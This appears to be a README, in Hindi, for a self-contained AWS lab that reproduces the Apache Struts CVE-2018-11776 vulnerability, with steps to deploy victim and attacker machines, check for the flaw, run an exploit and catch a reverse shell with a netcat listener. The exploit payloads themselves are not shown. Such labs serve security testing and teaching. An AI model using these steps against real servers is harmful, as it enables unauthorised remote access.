
अपाचे स्ट्रट्स भेद्यता CVE-2018-11776 के साथ प्रयोग के लिए एक पृथक परीक्षण वातावरण तैयार करता है।
Apache Struts भेद्यता CVE-2018-11776 के साथ प्रयोग के लिए एक पृथक परीक्षण वातावरण तैयार करता है।
परीक्षण वातावरण लाने के लिए, निम्न कमांड चलाएँ:
aws cloudformation create-stack \
--template-body file://cfn.yml \
--stack-name <STACK_NAME> \
--parameters \
ParameterKey=Ec2KeyName,ParameterValue=<KEY_NAME> \
ParameterKey=Linux2Ami,ParameterValue=<AMAZON_LINUX2_AMI_ID>
पीड़ित और हमलावर के IP पते प्राप्त करें। दोनों के लिए SSH सत्र आरंभ करें:
# Victim public IP
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
--query 'Stacks[0].Outputs[?OutputKey==`VictimPublicIp`].OutputValue' --output text
# Attacker public IP
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
--query 'Stacks[0].Outputs[?OutputKey==`AttackerPublicIp`].OutputValue' --output text
यह जांचने के लिए उपयोग किया जाने वाला कमांड प्राप्त करें कि पीड़ित असुरक्षित है या नहीं। इसे हमलावर सत्र पर निष्पादित करें:
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
--query 'Stacks[0].Outputs[?OutputKey==`CheckVuln`].OutputValue' --output text
(वैकल्पिक) यह देखने के लिए उपयोग किया जाने वाला कमांड प्राप्त करें कि शोषण काम करता है या नहीं। इसे हमलावर सत्र पर निष्पादित करें:
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
--query 'Stacks[0].Outputs[?OutputKey==`RunExploit`].OutputValue' --output text
रिवर्स टनल सुनने के लिए हमलावर मशीन को सेट अप करें:
nc -lvp 31337
पीड़ित को हमलावर के लिए रिवर्स टनल शुरू करने के लिए मजबूर करने वाला कमांड प्राप्त करें:
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
--query 'Stacks[0].Outputs[?OutputKey==`RunReverseShell`].OutputValue' --output text
हमलावर मशीन के लिए एक अतिरिक्त SSH सत्र खोलें। फिर, पिछले चरण में प्राप्त कमांड चलाएँ।
रिवर्स टनल सत्र पर वापस जाएँ। अब आपके पास पीड़ित मशीन तक CLI पहुँच है।
परीक्षण वातावरण को नष्ट करने के लिए, निम्न कमांड जारी करें:
aws cloudformation delete-stack --stack-name <STACK_NAME>
यह डेमो hook-s3c के CVE-2018-11776-Python-PoC PoC कोड पर आधारित है।